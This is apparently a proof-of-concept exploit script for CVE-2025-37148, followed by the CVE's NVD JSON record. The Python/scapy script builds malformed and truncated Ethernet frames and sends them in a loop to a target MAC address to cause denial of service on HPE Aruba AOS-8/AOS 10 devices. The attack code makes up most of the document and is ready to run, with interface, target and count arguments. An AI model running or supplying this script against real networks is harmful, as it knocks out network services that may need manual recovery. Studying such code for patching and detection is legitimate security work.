CVE-2025-37148

#!/usr/bin/env python3 # CVE-2025-37148 - HPE Aruba AOS-8/AOS 10 Ethernet Frame Parsing DoS # PoC for sending malformed Ethernet frames to trigger DoS from scapy.all import Ether, Raw, sendp, conf import argparse import sys def build_malicious_frame(target_mac, src_mac, ethertype=0xFFFF): """ Build a malformed Ethernet frame with abnormal EtherType to trigger parsing vulnerability in AOS-8/AOS 10 """ # Construct malformed Ethernet frame with non-standard EtherType frame = Ether(dst=target_mac, src=src_mac, type=ethertype) # Add abnormal payload that may trigger parsing error payload = b'\x00' * 64 + b'\xff\xfe\xfd\xfc' * 16 frame = frame / Raw(load=payload) return frame def build_truncated_frame(target_mac, src_mac): """ Build a truncated Ethernet frame with abnormal length field """ frame = Ether(dst=target_mac, src=src_mac, type=0x8100) # Minimal payload that may cause buffer underflow payload = b'\x00\x01\x00\x00' frame = frame / Raw(load=payload) return frame def main(): parser = argparse.ArgumentParser(description='CVE-2025-37148 PoC') parser.add_argument('-i', '--interface', required=True, help='Network interface') parser.add_argument('-t', '--target', required=True, help='Target MAC address') parser.add_argument('-s', '--source', default='aa:bb:cc:dd:ee:ff', help='Source MAC address') parser.add_argument('-c', '--count', type=int, default=100, help='Number of frames') args = parser.parse_args() conf.iface = args.interface print(f"[*] CVE-2025-37148 PoC - HPE Aruba DoS via Ethernet Frame Parsing") print(f"[*] Target: {args.target}") print(f"[*] Interface: {args.interface}") print(f"[*] Sending {args.count} malicious frames...") for i in range(args.count): # Send malformed frame with abnormal EtherType frame1 = build_malicious_frame(args.target, args.source) sendp(frame1, verbose=False) # Send truncated frame frame2 = build_truncated_frame(args.target, args.source) sendp(frame2, verbose=False) print(f"[*] Done. Target device may be in DoS state.") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-37148", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:41.897", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the parsing of ethernet frames in AOS-8 Instant and AOS 10 could allow an unauthenticated remote attacker to conduct a denial of service attack. Successful exploitation could allow an attacker to potentially disrupt network services and require manual intervention to restore functionality."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04958en_us&docLocale=en_US", "source": "[email protected]"}]}}